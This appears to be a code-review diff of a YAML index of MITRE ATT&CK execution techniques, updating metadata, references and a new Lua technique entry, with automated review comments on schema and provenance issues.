x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25693,6 +26003,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25703,16 +26014,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -25743,14 +26054,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25816,39 +26124,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25857,6 +26139,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25869,19 +26152,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
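Review bot: `x_mitre_permissions_required` with `User` and `root` is removed from T1569.001 with no replacement, whereas T1053.003 earlier in this diff keeps its `x_mitre_permissions_required` block untouched. Unlike the rest of this hunk, which re-adds the removed keys in a new order (`id`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`, platforms, domains), this is a genuine content change and should be mentioned in the commit message if it reflects the upstream object.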
@@ -25924,7 +26230,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
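Review bot: `modified` for T1059.008 also moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-19T20:28:09.848Z`, and the context in the next hunk shows this entry still at `x_mitre_attack_spec_version: 2.1.0` while most others are bumped to 3.2.0. Same concern as for T1559.001: confirm the source bundle, since a regeneration is not expected to roll timestamps back.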
@@ -25940,72 +26246,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
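Review bot: the new bullet `* Coerceing users to copy, paste, and execute malicious code manually` carries a typo ("Coercing"); if the text mirrors upstream ATT&CK it should be fixed there, otherwise fix it here. The list is also followed directly by the `For example, tech support scams ...` paragraph with no blank line, so a Markdown renderer will fold that paragraph into the last bullet; a blank line between them, as there is between the intro sentence and the list, keeps the structure. Separately, the XPC Services description moved in this hunk keeps its mid-sentence breaks after `XPC Service C API` and `NSXPCConnection API`, which inside a `|-` literal block become real newlines in the rendered text; that is pre-existing but worth a separate clean-up.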
@@ -26013,7 +26322,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26028,7 +26341,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -26055,6 +26368,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26065,15 +26382,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
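Review bot: the `- spec_version: '2.1'` deletion here, repeated in nearly every following hunk, is a schema change rather than a content refresh: every technique object loses the STIX spec_version key. If that is a deliberate consequence of the newer upstream bundle, say so in the PR description and confirm nothing downstream reads that key; if it is a side effect of the generator dropping keys it does not know, the generator is where it should be fixed.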
@@ -26090,7 +26411,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26138,7 +26459,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -26171,12 +26492,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26237,8 +26557,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
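Review bot: the 'Github PSAttack' reference URL moves from the original author's repository (github.com/jaredhaight/PSAttack) to a copy under an unrelated account (github.com/Exploit-install/PSAttack-1). This follows upstream ATT&CK, but a third-party fork is a weaker provenance anchor than the author's own tree, so it is worth flagging upstream; readers of this index should not treat the mirrored repository as equivalent to the original.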
@@ -26260,12 +26581,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26343,14 +26663,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26408,36 +26727,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
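Review bot: the -36/+11 count for T1559 overstates the change. x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, created_by_ref and external_references deleted here all reappear under the same object in the next hunk, only in a different key order. Emitting keys in a stable order (or diffing the parsed YAML rather than the text) would leave just the real changes visible, which here is the `modified` timestamp.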
@@ -26458,25 +26752,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
